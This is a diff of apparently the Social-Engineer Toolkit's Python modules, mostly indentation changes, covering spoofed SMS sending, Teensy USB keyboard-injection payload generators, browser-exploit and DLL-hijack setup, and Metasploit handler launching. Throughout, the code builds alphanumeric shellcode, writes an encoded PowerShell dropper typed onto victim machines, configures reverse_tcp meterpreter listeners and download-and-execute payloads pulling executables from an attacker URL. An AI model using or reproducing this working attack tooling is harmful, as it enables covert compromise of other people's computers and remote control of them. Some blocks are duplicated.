send_sohoos_sms(to.rstrip(), origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
#Lleida.net service
if service_option == '2':
user = raw_input(core.setprompt(["7"], "Your Lleida.net user"))
password = raw_input(core.setprompt(["7"], "Your Lleida.net password"))
email = raw_input(core.setprompt(["7"], "Email for the receipt (optional)"))
for to in phones:
send_lleidanet_sms(to.rstrip(), origin.rstrip(), body.rstrip(), user, password, email)
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
#SMSGANG service
if service_option == '3':
pincode = raw_input(core.setprompt(["7"], "Your SMSGANG pincode"))
for to in phones:
send_smsgang_sms(to.rstrip(), origin.rstrip(), body.rstrip(), pincode)
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
#Andriod Emulator service
if service_option == '4':
for to in phones:
send_android_emu_sms(origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
#Andriod Emulator service
if service_option == '4':
for to in phones:
send_android_emu_sms(origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()


@ -1,6 +1,6 @@
#!/usr/bin/python
import binascii,base64,sys,os,random,string,subprocess,socket
from src.core.setcore import *
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
@ -62,7 +62,7 @@ This program will take shellexeccode which is converted to hexadecimal and
place it onto a victim machine through hex to binary conversion via powershell.
After the conversion takes place, Alphanumeric shellcode will then be injected
straight into memory and the stager created and shot back to you.
straight into memory and the stager created and shot back to you.
"""
# if we dont detect metasploit
@ -71,13 +71,13 @@ if not os.path.isfile(msf_path): sys.exit("\n[!] Your no gangster... Metasploit
# if we hit here we are good since msfpayload is installed
###################################################
# USER INPUT: SHOW PAYLOAD MENU 2 #
###################################################
###################################################
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload=(raw_input(setprompt(["14"], "")))
if payload == "exit" :
exit_set()
if payload == "exit" :
exit_set()
# if its default then select meterpreter
if payload == "" : payload="2"
@ -88,47 +88,47 @@ payload=ms_payload(payload)
# if we're downloading and executing a file
url = ""
if payload == "windows/download_exec":
url = raw_input(setprompt(["6"], "The URL with the payload to download and execute"))
url = "set URL " + url
url = raw_input(setprompt(["6"], "The URL with the payload to download and execute"))
url = "set URL " + url
# try except for Keyboard Interrupts
try:
# grab port number
while 1:
port = raw_input(setprompt(["6"], "Port to listen on [443]"))
# assign port if enter is specified
if port == "": port = 443
try:
# try to grab integer port
port = int(port)
# if we aren't using a valid port
if port >= 65535:
# trigger exception
port = "dfds"
port = int(port)
break
# grab port number
while 1:
port = raw_input(setprompt(["6"], "Port to listen on [443]"))
# assign port if enter is specified
if port == "": port = 443
try:
# try to grab integer port
port = int(port)
# if we aren't using a valid port
if port >= 65535:
# trigger exception
port = "dfds"
port = int(port)
break
# if we bomb out then loop through again
except:
print " [!] Not a valid port number, try again."
# pass through
pass
# if we bomb out then loop through again
except:
print " [!] Not a valid port number, try again."
# pass through
pass
# except keyboardintterupts here
except KeyboardInterrupt:
print """
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
disabled.\n"""
print """
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
disabled.\n"""
sys.exit("\n[!] Control-C detected. Bombing out. Later Gangster...\n\n")
sys.exit("\n[!] Control-C detected. Bombing out. Later Gangster...\n\n")
print " [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim..."
# grab msfpayload alphanumeric shellcode to be inserted into shellexec
proc = subprocess.Popen("msfpayload %s EXITFUNC=thread LHOST=%s LPORT=%s %s R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX" % (payload,ipaddr,port,url), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read in stdout which will be our alphanumeric shellcode
alpha_payload = proc.stdout.read()
alpha_payload = proc.stdout.read()
# generate a random filename this is going to be needed to read 150 bytes in at a time
random_filename = generate_random_string(10,15)
# prep a file to write
@ -150,7 +150,7 @@ output_variable = "/* Teensy Hex to File Created by Josh Kelley (winfang) and Da
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"$HOME\\AppData\\Local\\Temp\\%s.exe\",$b)" % (random_filename,random_filename))
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
@ -162,8 +162,8 @@ powershell_command = unicode("$s=gc \"$HOME\\AppData\\Local\\Temp\\%s\";$s=[stri
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
@ -172,29 +172,29 @@ powershell_command = base64.b64encode(powershell_command)
# while true
while 1:
# read 150 bytes in at a time
reading_hex = fileopen.read(space).rstrip()
# if its blank then break out of loop
if reading_hex == "": break
# write out counter and hex
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_hex)
# increase counter
counter = counter +1
# read 150 bytes in at a time
reading_hex = fileopen.read(space).rstrip()
# if its blank then break out of loop
if reading_hex == "": break
# write out counter and hex
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_hex)
# increase counter
counter = counter +1
# write out the rest
output_variable += "PROGMEM const char *exploit[] = {\n"
# while rev_counter doesn't equal regular counter
while rev_counter != counter:
output_variable+="RevShell_%s" % rev_counter
# incremenet counter
rev_counter = rev_counter + 1
if rev_counter == counter:
# if its equal that means we
# are done and need to append a };
output_variable+="};\n"
if rev_counter != counter:
# if we don't equal, keep going
output_variable+=",\n"
output_variable+="RevShell_%s" % rev_counter
# incremenet counter
rev_counter = rev_counter + 1
if rev_counter == counter:
# if its equal that means we
# are done and need to append a };
output_variable+="};\n"
if rev_counter != counter:
# if we don't equal, keep going
output_variable+=",\n"
# vbs filename
vbs = generate_random_string(10,15) + ".vbs"
@ -206,7 +206,7 @@ output_variable += ("""
char buffer[55];
int ledPin = 11;
void setup() {
void setup() {
pinMode(ledPin, OUTPUT);
}
void loop()
@ -228,7 +228,7 @@ void loop()
strcpy_P(buffer, (char*)pgm_read_word(&(exploit[i])));
Keyboard.print(buffer);
delay(80);
}
}
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
delay(5000);
CtrlS();
@ -277,12 +277,12 @@ Keyboard.send_now();
}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
@ -323,6 +323,5 @@ subprocess.Popen("msfconsole -r src/program_junk/answer.txt", shell=True).wait()
print " [*] Housekeeping old files..."
# if our answer file is still there (which it should be), then remove it
if os.path.isfile("src/program_junk/answer.txt"):
# remove the old file, no longer used once we've exited
subprocess.Popen("rm src/program_junk/answer.txt", shell=True).wait()
# remove the old file, no longer used once we've exited
subprocess.Popen("rm src/program_junk/answer.txt", shell=True).wait()


@ -13,11 +13,11 @@ payload = raw_input("Select payload you want to delivery via the powershell - sh
if payload == "": payload = "2"
if payload == "1":
path = "src/program_junk/x86.powershell"
payload = "windows/meterpreter/reverse_tcp"
path = "src/program_junk/x86.powershell"
payload = "windows/meterpreter/reverse_tcp"
if payload == "2":
path = "src/program_junk/x64.powershell"
payload = "windows/x64/meterpreter/reverse_tcp"
path = "src/program_junk/x64.powershell"
payload = "windows/x64/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep
@ -38,21 +38,21 @@ output_variable = "#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "": break
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_encoded)
counter = counter + 1
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "": break
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_encoded)
counter = counter + 1
rev_counter = 0
output_variable += "PROGMEM const char *exploit[] = {\n"
while rev_counter != counter:
output_variable+="RevShell_%s" % rev_counter
rev_counter = rev_counter +1
if rev_counter == counter:
output_variable+="};\n"
if rev_counter != counter:
output_variable+=",\n"
output_variable+="RevShell_%s" % rev_counter
rev_counter = rev_counter +1
if rev_counter == counter:
output_variable+="};\n"
if rev_counter != counter:
output_variable+=",\n"
teensy = output_variable
@ -61,7 +61,7 @@ teensy+=("""
char buffer[55];
int ledPin = 11;
void setup() {
void setup() {
pinMode(ledPin, OUTPUT);
}
void loop()
@ -77,7 +77,7 @@ void loop()
strcpy_P(buffer, (char*)pgm_read_word(&(exploit[i])));
Keyboard.print(buffer);
delay(30);
}
}
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
@ -114,12 +114,12 @@ Keyboard.send_now();
}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
@ -150,24 +150,24 @@ choice = yesno_prompt("0","Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
else:
port = raw_input("Enter the port to connect back on: ")
if check_options("PORT=") != 0:
port = check_options("PORT=")
filewrite = file("src/program_junk/metasploit.answers", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload,ipaddr,port))
filewrite.close()
print "[*] Launching Metasploit...."
try:
child = pexpect.spawn("msfconsole -r src/program_junk/metasploit.answers")
child.interact()
except: pass
else:
port = raw_input("Enter the port to connect back on: ")
filewrite = file("src/program_junk/metasploit.answers", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload,ipaddr,port))
filewrite.close()
print "[*] Launching Metasploit...."
try:
child = pexpect.spawn("msfconsole -r src/program_junk/metasploit.answers")
child.interact()
except: pass


@ -30,7 +30,7 @@ you to have a Teensy device with a soldered USB device on it and place the
file that this tool outputs in order to successfully complete the task.
It works by reading natively off the SDCard into a buffer space thats then
written out through the keyboard.
written out through the keyboard.
"""
# if we hit here we are good since msfpayload is installed
@ -42,11 +42,11 @@ print """
# grab the path and filename from user
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path): break
if not os.path.isfile(path):
while 1:
print_warning("Filename not found, try again")
path = raw_input(setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path): break
print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
print_status("Converting the executable to a hexadecimal form to be converted later...")
@ -138,7 +138,7 @@ void setup()
delay(10);
}
dataFile.close();
}
}
else {
Keyboard.println("error opening converts.txt");
}
@ -154,7 +154,7 @@ void setup()
delay(1000);
Keyboard.println("powershell -EncodedCommand %s");
// Tweak this delay. Larger files take longer to decode through powershell.
delay(10000);
delay(10000);
Keyboard.println("echo Set WshShell = CreateObject(\\"WScript.Shell\\") > %%TEMP%%\\\\%s");
Keyboard.println("echo WshShell.Run chr(34) ^& \\"%%TEMP%%\\\\%s\\" ^& Chr(34), 0 >> %%TEMP%%\\\\%s");
Keyboard.println("echo Set WshShell = Nothing >> %%TEMP%%\\\\%s");
@ -191,12 +191,12 @@ Keyboard.send_now();
}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
@ -227,7 +227,7 @@ Instructions:
Copy the converts.txt file to the sdcard on the Teensy device. Use the teensy.pde normally
and use the Arduino IDE to place the latest code in there. Notice that you need to change
some code marked above based on the Teensy and the Teensy++ based on how you soldered the PIN's
on.
on.
Happy hacking.
"""


@ -26,19 +26,19 @@ apache=0
apache_check=file("%s/config/set_config" % (definepath),"r").readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
line=line.rstrip()
# if apache is turned on get things ready
match=re.search("APACHE_SERVER=ON",line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2=re.search("APACHE_DIRECTORY=", line2)
if match2:
line2=line2.rstrip()
apache_path=line2.replace("APACHE_DIRECTORY=","")
apache=1
# strip \r\n
line=line.rstrip()
# if apache is turned on get things ready
match=re.search("APACHE_SERVER=ON",line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2=re.search("APACHE_DIRECTORY=", line2)
if match2:
line2=line2.rstrip()
apache_path=line2.replace("APACHE_DIRECTORY=","")
apache=1
# grab info from config file
@ -46,68 +46,68 @@ fileopen=file("src/program_junk/teensy", "r")
counter=0
payload_counter=0
for line in fileopen:
line=line.rstrip()
if counter == 0:
choice=str(line)
if counter == 1:
payload_counter=1
counter=counter+1
line=line.rstrip()
if counter == 0:
choice=str(line)
if counter == 1:
payload_counter=1
counter=counter+1
if choice != "14":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
if not os.path.isfile("src/program_junk/teensy"):
print_error("FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
print_error("FATAL:Something went wrong, the Teensy config file was not created.")
exit_set()
def writefile(filename,now):
fileopen=file("src/teensy/%s" % filename, "r")
filewrite=file("reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match=re.search("IPADDR",line)
if match:
line=line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
fileopen=file("src/teensy/%s" % filename, "r")
filewrite=file("reports/teensy_%s.pde" % (now), "w")
for line in fileopen:
match=re.search("IPADDR",line)
if match:
line=line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
filewrite.write(line)
filewrite.close()
filewrite.write(line)
filewrite.close()
# powershell downloader
if choice == "1":
writefile("powershell_down.pde", now)
writefile("powershell_down.pde", now)
# wscript downloader
if choice == "2":
writefile("wscript.pde",now)
writefile("wscript.pde",now)
# powershell reverse
if choice == "3":
writefile("powershell_reverse.pde",now)
writefile("powershell_reverse.pde",now)
# beef injector
if choice == "4":
writefile("beef.pde",now)
writefile("beef.pde",now)
# java applet downloader
if choice == "5":
writefile("java_applet.pde",now)
writefile("java_applet.pde",now)
# gnome wget downloader
if choice == "6":
writefile("gnome_wget.pde",now)
writefile("gnome_wget.pde",now)
if choice == "13":
writefile("peensy.pde",now)
payload_counter = 0
writefile("peensy.pde",now)
payload_counter = 0
# save our stuff here
print bcolors.BLUE + "\n[*] PDE file created. You can get it under 'reports/teensy_%s.pde' " % (now) +bcolors.ENDC
@ -117,22 +117,22 @@ print bcolors.RED + "\n[*] If your running into issues with VMWare Fusion and th
pause = raw_input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir src/program_junk/web_clone/;cp src/program_junk/msf.exe src/program_junk/web_clone/x.exe 1> /dev/null 2> /dev/null", shell=True).wait()
if operating_system != "windows":
child=pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp src/program_junk/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
if os.path.isfile("src/program_junk/meta_config"):
print bcolors.BLUE + "\n[*] Launching MSF Listener..."
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC
try:
if operating_system != "windows":
child1=pexpect.spawn("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (msf_path))
child1.interact()
except:
if operating_system != "windows":
if apache == 0:
child.close()
child1.close()
if apache == 0:
subprocess.Popen("mkdir src/program_junk/web_clone/;cp src/program_junk/msf.exe src/program_junk/web_clone/x.exe 1> /dev/null 2> /dev/null", shell=True).wait()
if operating_system != "windows":
child=pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp src/program_junk/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
if os.path.isfile("src/program_junk/meta_config"):
print bcolors.BLUE + "\n[*] Launching MSF Listener..."
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC
try:
if operating_system != "windows":
child1=pexpect.spawn("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (msf_path))
child1.interact()
except:
if operating_system != "windows":
if apache == 0:
child.close()
child1.close()


@ -14,21 +14,21 @@ port = ""
multiattack="off"
webdav_enabled="off"
if os.path.isfile("src/program_junk/multi_payload"):
multiattack="on"
# just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port
webdav_enabled="off"
webdav_write=file("src/program_junk/webdav_enabled","w")
multiattack="on"
# just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port
webdav_enabled="off"
webdav_write=file("src/program_junk/webdav_enabled","w")
fileopen=file("src/program_junk/multi_payload", "r")
for line in fileopen:
match=re.search("MAIN=",line)
if match:
port=line.replace("MAIN=","")
match2=re.search("MAINPAYLOAD=",line)
if match2:
exploit=line.replace("MAINPAYLOAD=",line)
fileopen=file("src/program_junk/multi_payload", "r")
for line in fileopen:
match=re.search("MAIN=",line)
if match:
port=line.replace("MAIN=","")
match2=re.search("MAINPAYLOAD=",line)
if match2:
exploit=line.replace("MAINPAYLOAD=",line)
# grab metasploit path
metasploit_iframe="8080"
@ -37,76 +37,76 @@ msf_path = meta_path()
configfile=file("%s/config/set_config" % (definepath),"r").readlines()
for line in configfile:
line=line.rstrip()
line=line.rstrip()
match4=re.search("METERPRETER_MULTI_SCRIPT=", line)
if match4:
meterpreter_multi=line.replace("METERPRETER_MULTI_SCRIPT=", "")
match4=re.search("METERPRETER_MULTI_SCRIPT=", line)
if match4:
meterpreter_multi=line.replace("METERPRETER_MULTI_SCRIPT=", "")
match5=re.search("METERPRETER_MULTI_COMMANDS=", line)
if match5:
meterpreter_multi_command=line.replace("METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command=meterpreter_multi_command.replace(";", "\n")
match5=re.search("METERPRETER_MULTI_COMMANDS=", line)
if match5:
meterpreter_multi_command=line.replace("METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command=meterpreter_multi_command.replace(";", "\n")
match6=re.search("METASPLOIT_IFRAME_PORT=", line)
if match6:
metasploit_iframe=line.replace("METASPLOIT_IFRAME_PORT=", "")
match6=re.search("METASPLOIT_IFRAME_PORT=", line)
if match6:
metasploit_iframe=line.replace("METASPLOIT_IFRAME_PORT=", "")
match7=re.search("AUTO_MIGRATE=", line)
if match7:
auto_migrate=line.replace("AUTO_MIGRATE=", "")
match7=re.search("AUTO_MIGRATE=", line)
if match7:
auto_migrate=line.replace("AUTO_MIGRATE=", "")
# grab attack vector
attack_vector=""
if os.path.isfile("src/program_junk/attack_vector"):
fileopen=file("src/program_junk/attack_vector")
for line in fileopen:
attack_vector=line.rstrip()
fileopen=file("src/program_junk/attack_vector")
for line in fileopen:
attack_vector=line.rstrip()
# open ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your ipaddress: ")
update_options("IPADDR=" + ipaddr)
ipaddr = raw_input("Enter your ipaddress: ")
update_options("IPADDR=" + ipaddr)
debug_msg(me,"printing 'text.browser_exploits_menu'",5)
show_browserexploit_menu = create_menu(browser_exploits_text, browser_exploits_menu)
exploit=raw_input(setprompt(["4"], ""))
if exploit == '':
print "\n Defaulting to IE CSS Import Use After Free exploit....."
exploit=("1")
if exploit == '':
print "\n Defaulting to IE CSS Import Use After Free exploit....."
exploit=("1")
# dictionary = ms_module
exploit = ms_module(exploit)
choice1=""
if multiattack == "off":
if exploit != "windows/browser/java_codebase_trust":
show_payload_menu_2 = create_menu(payload_menu_2_text, payload_menu_2)
choice1=raw_input(setprompt(["4"], ""))
if multiattack == "off":
if exploit != "windows/browser/java_codebase_trust":
show_payload_menu_2 = create_menu(payload_menu_2_text, payload_menu_2)
choice1=raw_input(setprompt(["4"], ""))
if choice1 == '':choice1 ='2'
choice1 = ms_payload(choice1)
# if we are using the java exploit
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean" or exploit == "exploit/multi/browser/java_jre17_jmxbean_2":
print "[*] Selecting Java Meterpreter as payload since it is exploit specific."
choice1 = ("java/meterpreter/reverse_tcp")
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean" or exploit == "exploit/multi/browser/java_jre17_jmxbean_2":
print "[*] Selecting Java Meterpreter as payload since it is exploit specific."
choice1 = ("java/meterpreter/reverse_tcp")
if multiattack == "off":
port=raw_input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "": port = "443"
port=raw_input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "": port = "443"
# check to see if we need to use the multi attack vector in java
if not os.path.isfile("src/program_junk/multi_java"):
filewrite=file("src/program_junk/meta_config", "w")
filewrite=file("src/program_junk/meta_config", "w")
if os.path.isfile("src/program_junk/multi_java"):
filewrite=file("src/program_junk/meta_config", "a")
filewrite=file("src/program_junk/meta_config", "a")
filewrite.write("use "+exploit+"\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
@ -115,63 +115,63 @@ filewrite.write("set LPORT %s" % (port) + "\n")
#filewrite.write("set ENCODING shikata_ga_nai"+"\n")
filewrite.write("set URIPATH /"+"\n")
if choice1 == ("windows/download_exec"):
print "You selected the download and execute payload. Enter the URL to your executable."
print "Example would be http://172.16.32.129/malicious.exe"
set_url=raw_input(setprompt(["4"], "URL to the executable"))
filewrite.write("set URL %s" % (set_url) + "\n")
print "You selected the download and execute payload. Enter the URL to your executable."
print "Example would be http://172.16.32.129/malicious.exe"
set_url=raw_input(setprompt(["4"], "URL to the executable"))
filewrite.write("set URL %s" % (set_url) + "\n")
# if it isn't used for webdav then redirect to metasploit iframe configuration setting
if exploit != 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
if exploit != 'windows/browser/ms10_046_shortcut_icon_dllloader':
if exploit != 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT %s" % (metasploit_iframe) + "\n")
if exploit != 'windows/browser/ms10_046_shortcut_icon_dllloader':
if exploit != 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT %s" % (metasploit_iframe) + "\n")
# if webdav is needed for exploit, change base port
if exploit == 'windows/browser/ms10_042_helpctr_xss_cmd_exec':
filewrite.write("set SRVPORT 80"+"\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
filewrite.write("set SRVPORT 80"+"\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/ms10_046_shortcut_icon_dllloader':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80"+"\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
if exploit == 'windows/browser/webdav_dll_hijacker':
filewrite.write("set SRVPORT 80"+"\n")
filewrite.write("set SRVPORT 80"+"\n")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
# if we are using multi attack
if multiattack == "on":
webdav_write.write("WEBDAV_ENABLED")
extension=raw_input(setprompt(["4"], "Extension types for this exploit [all]"))
if extension == '':
filewrite.write("set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html"+"\n")
else:
filewrite.write("set EXTENSIONS %s" % (extension) + "\n")
extension=raw_input(setprompt(["4"], "Extension types for this exploit [all]"))
if extension == '':
filewrite.write("set EXTENSIONS p7c wab ppt pptx zip vsd docx grp snag wbcat eml odp pot ppsx htm html"+"\n")
else:
filewrite.write("set EXTENSIONS %s" % (extension) + "\n")
filewrite.write("set ExitOnSession false\n")
# if we are using multiple meterpreter multiscripts
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
# auto migration
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("exploit -j\n\n")
filewrite.close()
# close webdav file if it was turned on
if webdav_enabled == "on":
webdav_write.close()
webdav_write.close()
# this basically sets a flag we need to make some custom changes in web_server.py to get
# the docbase exploit to work properly
if exploit == ("windows/browser/java_docbase_bof"):
filewrite=file("src/program_junk/docbase.file", "w")
filewrite.write("DOCBASE=ON")
filewrite.close()
filewrite=file("src/program_junk/docbase.file", "w")
filewrite.write("DOCBASE=ON")
filewrite.close()


@ -16,11 +16,11 @@ from src.core.setcore import *
definepath=os.getcwd()
try:
import zipfile
import zipfile
except ImportError, error:
log(error)
print "Module 'zipfile' was not detected, please download and install the python zipfile module"
exit_set()
log(error)
print "Module 'zipfile' was not detected, please download and install the python zipfile module"
exit_set()
print dll_hijacker_text
@ -31,15 +31,15 @@ fileopen=file("src/webattack/dll_hijacking/repository", "r")
print " Enter the choice of the file extension you want to attack:\n"
counter=1
for line in fileopen:
line=line.split(",")
print " " + str(counter)+". "+line[0]
counter=counter+1
line=line.split(",")
print " " + str(counter)+". "+line[0]
counter=counter+1
print "\n"
choice=raw_input(setprompt(["2","15"], ""))
if choice == 'exit':
exit_set()
exit_set()
if choice == "": choice="1"
@ -49,12 +49,12 @@ choice=int(choice)
counter=1
fileopen=file("src/webattack/dll_hijacking/repository", "r")
for line in fileopen:
line=line.split(",")
if int(counter) == int(choice):
name=line[0].rstrip()
extension="."+line[1].rstrip()
dll=line[2].rstrip()
counter=counter+1
line=line.split(",")
if int(counter) == int(choice):
name=line[0].rstrip()
extension="."+line[1].rstrip()
dll=line[2].rstrip()
counter=counter+1
print "\n [*] You have selected the file extension of %s and vulnerable dll of %s" % (extension,dll)
@ -69,10 +69,10 @@ filewrite.write("EMPTY")
filewrite.close()
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["2","15"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
ipaddr=raw_input(setprompt(["2","15"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
